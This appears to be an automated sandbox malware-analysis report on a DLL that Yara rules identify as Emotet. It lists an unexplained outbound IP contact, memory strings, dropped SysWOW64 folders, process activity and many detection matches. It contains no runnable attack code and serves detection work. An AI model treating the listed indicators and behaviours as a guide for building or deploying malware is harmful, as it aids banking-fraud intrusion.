Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101

Source: svchost.exe, 00000015.00000003.511379311.000001E0BD5A2000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
Source: svchost.exe, 00000015.00000003.511379311.000001E0BD5A2000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
Source: svchost.exe, 00000015.00000003.511468259.000001E0BD5B3000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.511379311.000001E0BD5A2000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000015.00000003.511468259.000001E0BD5B3000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.511379311.000001E0BD5A2000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000015.00000003.511379311.000001E0BD5A2000.00000004.00000001.sdmp	String found in binary or memory: trings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"leve
Source: svchost.exe, 00000015.00000003.511379311.000001E0BD5A2000.00000004.00000001.sdmp	String found in binary or memory: trings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"leve

Source: svchost.exe, 00000015.00000002.528158834.000001E0BD500000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.863748399.000002E116062000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.11.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000015.00000003.504317499.000001E0BD583000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504779704.000001E0BDA19000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504403415.000001E0BD594000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504445076.000001E0BD5A5000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10001280 recvfrom,

3_2_10001280

Source: loaddll32.exe, 00000000.00000000.380317596.0000000000D6B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.5200000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5a90000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.54c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.46a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.53b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b50000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.56a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5640000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.46a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b50000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.d30000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.56d0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.55d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5460000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5600000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.53c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5200000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.46d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5930000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5640000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5630000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5900000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.55a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.55a0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5380000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.d30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.33d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.56a0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4e60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5600000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.33b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5670000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.54c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3080000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3660000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.33d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.54f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.4a10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5900000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5a60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.33b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5a60000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4050000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.388319825.0000000005640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388061342.00000000053B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388938400.0000000005A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425302680.00000000054F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388421865.00000000056A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.421593787.0000000004051000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388494502.00000000056D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388374896.0000000005671000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.424744123.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.390300102.0000000004A11000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388137915.0000000005460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425412117.0000000005600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388743358.0000000005900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425380885.00000000055D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.421559907.0000000004020000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.378920575.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.387667842.0000000004E61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.380234706.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.389941280.0000000003080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.377076576.00000000046D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.380280063.0000000000D31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425231298.00000000053C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.403315549.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.387995858.0000000005380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.379032722.0000000000D31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.389038479.0000000005A91000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425055302.0000000005200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.376980438.00000000046A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425273355.00000000054C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425444879.0000000005631000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388835673.0000000005931000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.387132452.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.388209292.0000000005491000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.425344500.00000000055A0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Source: ALNgwfVtrB.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Sqvvzhazj\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4EFDD	0_2_00D4EFDD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4CAD5	0_2_00D4CAD5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4CCD9	0_2_00D4CCD9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4D8DB	0_2_00D4D8DB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D380C0	0_2_00D380C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4BEFD	0_2_00D4BEFD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4E4E5	0_2_00D4E4E5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3F0E9	0_2_00D3F0E9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D500EF	0_2_00D500EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D53EE9	0_2_00D53EE9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D546BD	0_2_00D546BD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D40EBC	0_2_00D40EBC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3C6B8	0_2_00D3C6B8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D40ABA	0_2_00D40ABA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D4A2A5	0_2_00D4A2A5
